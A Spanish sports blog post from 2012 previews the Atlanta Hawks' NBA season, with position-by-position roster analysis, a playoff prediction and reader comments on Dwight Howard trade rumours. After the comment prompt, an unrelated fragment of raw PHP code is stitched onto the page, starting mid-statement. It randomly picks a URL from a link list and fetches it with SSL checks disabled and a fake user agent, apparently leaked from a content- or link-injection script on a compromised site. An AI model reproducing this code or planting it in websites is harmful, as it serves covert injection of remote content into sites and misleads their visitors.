Atlanta Hawks: Previsibles un año más

06 de January de 2012 por txusma

Empezaré el análisis por el final, por el pronóstico: Los Hawks se clasificarán para los playoffs con cierta holgura y caeran en 2ª ronda. De hecho, es lo que ha sucedido en las últimas 3 temporadas.

Los Hawks se han convertido en uno de los equipos más previsibles del campeonato y nada hace pensar que esta temporada vayan a cambiar las cosas por la ciudad de la Coca-Cola. El núcleo del equipo sigue siendo el mismo que el de las últimas campañas: Joe Johnson, Marvin Williams, Josh Smith y Al Horford. Seguro que varios de nosotros seríamos capaces de recitarlo de memoria como esos abuelos que recuerdan el once inicial del Zaragoza de “Los magnificos”, el Madrid de “La quinta del buitre” o el Barça de “les 5 copes”. Esto tiene su parte positiva: los jugadores de los Hawks se conocen a la perfección, llevan mucho tiempo jugando juntos. Y también tiene su parte negativa: son también muy previsibles sobre la cancha. Todos tenemos claros cuales son sus puntos flojos y cuales sus puntos fuertes. No cambian desde hace años.

El mayor punto de incertidumbre viene de la mano de Jeff Teague. El ex jugador de Wake Forest se encuentra ante la gran oportunidad de su carrera al ser el único base sano disponible en este inicio de temporada. De todas maneras, no solo las circunstancias le ha empujado a la titularidad. Su aportación en los Playoffs frente a los Chicago Bulls de Derrick Rose fue destacadísima con unos promedios de 15 puntos, 4 rebotes y 3 asistencias. Es el jugador de Atlanta que todos quieren ver. Se trata de un buen penetrador y defensor, ideal para el estilo más rápido que quiere instaurar Larry Drew. Si mejora su tiro exterior, los Hawks pueden haber encontrado al base que buscan desde que en 2005 escogieran a Marvin Williams por delante de Chris Paul, Deron Williams o Raymond Felton. Teague tiene en parte la tarea de asumir el trabajo hacía Jamal Crawford, una baja muy sensible para el equipo. Kirk Hinrich, una vez recuperado de su lesión, será el base suplente. Buen defensor, ha ido reduciendo cada año más su aportación ofensiva a los equipos por los que ha pasado. De todas maneras, él solo ya supondría toda una mejora sobre Mike Bibby. Se hablaba que este año podría haber minutos para Pape Sy, pero finalmente el jugador francés fue despedido al inclinarse los Hawks por la contratación del veterano Jannero Pargo, el microondas que viene a hacer de Jamal Crawford y a dar descanso a Teague en esta primera parte de la temporada.

El puesto de escolta es para el sobrepagado Joe Johnson. Su salario hace que le juzguemos con más dureza de la habitual pero es sin duda uno de los mejores escoltas de la liga. Gran tirador y con capacidad de jugar de base tiene la difícil tarea de liderar al equipo aunque nadie espera que de un salto de calidad o mejore sus números drásticamente. El año pasado jugó lastrado por una lesión en el codo por lo que el hecho de contar con él totalmente sano ya ha de suponer una buena noticia para los Hawks. Veremos si puede aprovechar las penetraciones de Teague para tirar más y mejor desde la línea de 3. Willie Green y Jerry Stackhouse han llegado para darle algunos minutos de descanso pero su presencia será testimonial. Jannero Pargo también disfrutará de minutos jugando de escolta cuando esté enchufado.

Marvin Williams continuará como el alero titular. Se trata de otro jugador infravalorado en su caso  por esa elección en el draft de 2005. Cuando los Hawks lo eligieron por delante de Chris Paul o Deron Williams seguro que esperaban mucho más de él pero creo que su rendimiento es más que correcto. No ha evolucionado lo que se esperaba los últimos 3 años pero aporta una buena defensa como alero y un tiro de media distancia muy respetable. Se ha convertido en un buen jugador de equipo y su edad, 25 años, aún nos permite ser optimistas en cuanto a su evolución. Además, se ha operado de unos problemas de espaldas que venía arrastrando desde hace años lo que podría aumentar su rendimiento. Para ser su suplente, los Hawks se han traído a un viejo rockero que ya ha hecho de las suyas, Tracy McGrady. No volverá a ser aquel que maravillaba al mundo en Orlando pero aún está para aportar más de 10 puntos por partido y varios rebotes y asistencias. Además, es un crack cuando la pelota quema.

Seguimos con lo sabido. Josh Smith será el ala-pivot titular y Al Horford el pívot. Mientras que el dominicano mejora año tras año, Josh Smith parece haber alcanzado su techo (que ya es alto). Siempre hemos esperado que mejorara su inteligencia baloncestística y dejara de jugarse tantos tiros pero a día de hoy estos aspectos son los que siguen separándole de ser un All Star año tras año. Defensivamente es de los mejores jugadores del campeonato, un auténtico seguro de vida. Horford seguirá siendo el center titular a pesar de que él realmente es un 4, sobretodo a la hora de defender. De todas maneras, su buena movilidad e inteligencia le permiten defender a las bestias pardas de la liga. En ataque, tiene un tiro de media distancia excelente, y cada día mejora sus movimientos al poste. En verano corrieron rumores de que Josh Smith estaba pidiendo el traspaso. ¿Podrían traspasarlo por un pívot de verdad y así permitir al ex de Florida jugar en su posición natural? Como recambios en el juego interior los Hawks disponían de Zaza Pachulia y Jason Collins. Demasiada poca cosa por lo que se han hecho con los servicios del serbio Vladimir Radmanovic.

Los Hawks llevan 4 temporadas alcanzando los Playoffs y todo apunta a que volverán a hacerlo. Se han instalado en la zona noble de la liga pero no acaban de encontrar la manera de dar un paso más. Sin cambiar los jugadores todo depende de su evolución y ahora mismo eso significa depender de lo que pueda aportar Jeff Teague y de las mínimas mejoras de Marvin Williams y Al Horford. De todas maneras, no será suficiente.

Quinteto: Jeff Teague, Joe Johnson, Marvin Williams, Josh Smith, Al Horford
6º Hombre: Tracy McGrady

Pronóstico: 4º-5º de la conferencia. 2ª ronda de Playoffs.

Comenta

14 comentarios a esta entrada

  1. Vader dice:
    #1

    Ojo que suenan mucho como posible destino de D.Howard y de producirse el traspaso podria alterar completamente el panorama en la ciudad de la Coca-Cola y en la conferencia Este.

    Saludos

      Citar

  2. melo15 dice:
    #2

    Y quien vendria a los magic

      Citar

  3. Denise dice:
    #3

    Tienen buen equipo y gente como McGrady o Radmanovic estan dando mas rendimiento del esperado. Es el tipico equipo (como los Blazers en el Oeste) que sabes que no van a ganar el anillo, pero que son capaces de ganar en una serie de playoffs a cualquiera.
    Eso si hay dos jugadores que no me convencen, Jeff Teague y sobre todo Marvin Williams, un jugador muy normalito que sobrevive en el 5 inicial gracias tal vez a su alta posicion en el Draft y como consecuencia que muchos estén esperando a a ver si de alguna vez por todas explota.

    No me importaria que se produjese un trade con Atlanta, el cual supongo que sería un Howard y Turkoglu por Josh Smith y Horford, aunque la verdad es que preferiria uno con Lakers por Pau y Bynum.

      Citar

  4. Sancho88 dice:
    #4

    Atlanta ha desperdiciado toda una generación de mucho talento para haber peleado por entrar en unas finales como hizo Orlando hace unos años. Se han anquilosado, como bien dice txus, y ya es imposible rescatarles más allá de segunda ronda. una desgracia de equipo con un potencial increíble que han dejado escapar. si el año pasado en vez de Bibby hubieran piyado un base de verdad… en fin, muy triste tener la ocasión de hacer algo grande y dejarlo pasar. siempre quedarán para el recuerdo con aquella serie de PO contra Boston, creo recordar

      Citar

  5. RSB dice:
    #5

    Los Hawks se han hipotecado el futuro con el contrato de JJ. Absurdo, desproporcionado, una soga al cuello. Realmente, si hubieran movido a JJ y hubieran renovado a Crawford dándole la titularidad, tampoco habría demasiadas diferencias en su nivel de juego actual, y tendrían mucho más espacio salarial para atraer a buenos jugadores. Como Howard. Podrían haberse movido por Odom, por ejemplo. Pero ahora mismo están condenados al ostracismo, a no ser que lo corten, lo que sería un desastre ya que volverían al hoyo a reconstruir.

    Aún así también creo que pueden llegar a semis de conferencia, si tienen un buen registro en RS y no se cruzan con los dos cocos, claro.

    Me sorprende el mal inicio de RS de Horford. El año pasado me parecía uno de los 3 mejores 5 (sin serlo) de la liga, pero ahora mismo Bynum ya le ha comido la tostada, y su participación esta siendo muy irregular.

      Citar

  6. Ru dice:
    #6

    Antaño era uno de mis equipos preferidos por Josh Smith,que con su intensidad me tenía enamorado y dejaba de lado su poca IQ confiando en que progresaría en ese sentido pero tras el paso de las temporadas sigue igual y abusando de un tiro exterior que él no tiene.Aún así le sigo guardando cariño y me seguiré peleando cuando alguien diga que Marvin Williams es el PF y Josh Smith el 3.Por cierto que con Marvin Williams soy crítico a más no poder y de hecho,bajo mi punto de vista,si sigue jugando de titular es porque los Hawks -o su dueño- son unos rácanos -mención aparte del contrato de JJ- y no han arriesgado por hacerse con un alero mejor.

    Coincido en el pronósitco pero les doy ese puntito favorable de que han presentado batallas muy dignas de ver en PO.

    PD.Lo de Howard se comenta como destinos Atlanta,Dallas,Lakers,Nets y Warriors.A mí particularme me atrae ver a Howard en los Warriors,cambiaría la franquicia totalmente -yo traspasaría a Monta Ellis y David Lee- además de que está cerca del Hollywood que según dicen busca DH12.Y desde luego sería una delicia ver la dupla Nowitzki-Howard en los Mavs.

      Citar

  7. melo15 dice:
    #7

    Entonces la conferencia Este seria un poco mierda

      Citar

  8. Ru dice:
    #8

    melo15:
    Entonces la conferencia Este seria un poco mierda

    No creo que la Conferencia Este fuera una mierda si Hopward se pasa al oeste,está Miami a un nivel,Chicago a otro y luego hay una serie de equipos(Boston,Indiana,Orlando,Atlanta..)que pueden aspirar a llegar a semis y rezar para que no les toquen los dos gordos.Pero porque se vaya Howard el este no se va al garete la conferencia,cambiaría muy poco el panorama actual.

      Citar

  9. RSB dice:
    #9

    Donde la conferencia este da bastante grimilla es del séptimo-octavo puesto para abajo, hay sí que la diferencia es bastante abismal entre ambas coferencias, aún sin que salga Howard

      Citar

  10. Len Bias dice:
    #10

    Enorme la mención al Zaragoza de “los magníficos”: Canario, Santos, Villa, Marcelino y Lapetra 😉

      Citar

  11. esteban dice:
    #11

    Parece intracendente comentar algo de los hawks, creo q el post del año pasado les cabe para este a la perfeccion, su novedad es teagle q es un buen jugador, pero nada mas, imposible q el les de el salto de calidad, imposible q marvin se valla a un 20 y 10, o q jj mejore sus prestaciones pasadas, en fin son un equipo genial, segunda ronda frente a chicago o miami y gracias, no hay chances de mas
    Mencion aparte el arranque de mcgrady, hace recordar de a momentos sus tiempos all star, si sigue asi y heinrich vuelve bien, quiza, solo quiza puedan dar la sorpresa y llegar a final de conferencia

    Sobre howard, veo un traspaso a mitad de año, orlando es cada año menos fuerte q el anterior, no hay chances q renueve, es hora de hacer ofertas por q seguramente seran aceptadas

    Candidatos, me gusta lo propuesto por los warrios, aunque habira q meter a kwane y a anderson de cada lado para no desequilibrar equipos, dallas no tiene q ofrecer hoy, atlanta deberia mandar a smitj y a jj si orlando lo acepta por howard y turkoglu, o cambio de internosn smith y harford por anderson y howard

    Los nets o hacewn algo ya o pierden a deron, brooks aparece como un nuevo activo q los nets no tenian antes, el mas lopez, mas elecciones, por howard y comerse el contrato de hedo..

      Citar

  12. RSB dice:
    #12

    ¿Soy el único que piensa que Howard en los Nets no se comería un colín en años por mucho Deron y Humphries que tenga al lado? Menudo solar que tienen, vaya plantilla de nivel paupérrimo… Si se quedan sin Brooks, López y una primera ronda (que será muy alta y es lo más jugoso del traspaso)… Si no fichan a Howard adiós a Deron, y entonces sí que podríamos hablar de una operación increíblemente desastrosa, estarían condenados a años de ostracismo (si no lo están ya).

      Citar

  13. Txusma dice:
    #13

    Hombre, a mi un Howard-Deron me parece mucho más que el Carmelo-Amare con el que se quedaron los Knicks el año pasado. Supongo que sería el primer paso para después ir poco a poco. Si se queda Humhries y fichan a Kirilenko, el equipo ya tiene mejor pinta.

      Citar

  14. esteban dice:
    #14

    Igualb creo q con el nuevo convenio y las penalidades el juntar estrellas es cada vez mas inviable

    Imaginemos unos nets con deron y howard, 20 mill cada uno, son 40 mill, si se queda humpries, hoy esta cobrando 10 mill, vamos 50, y tienen comprometidos 4 en morrow, 4 en farmar y 4 en petro, es decir 62 mill y aun asi no son un gran equipo, si en dos años por cada dolar sobre el imp se pagaran 3, veremos cada vez mas las estrellas dispersas por todos los equipo, ya q pocos equipos podran tener 40 mill en solo dos jugadores, solo les queda resignar dinero

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>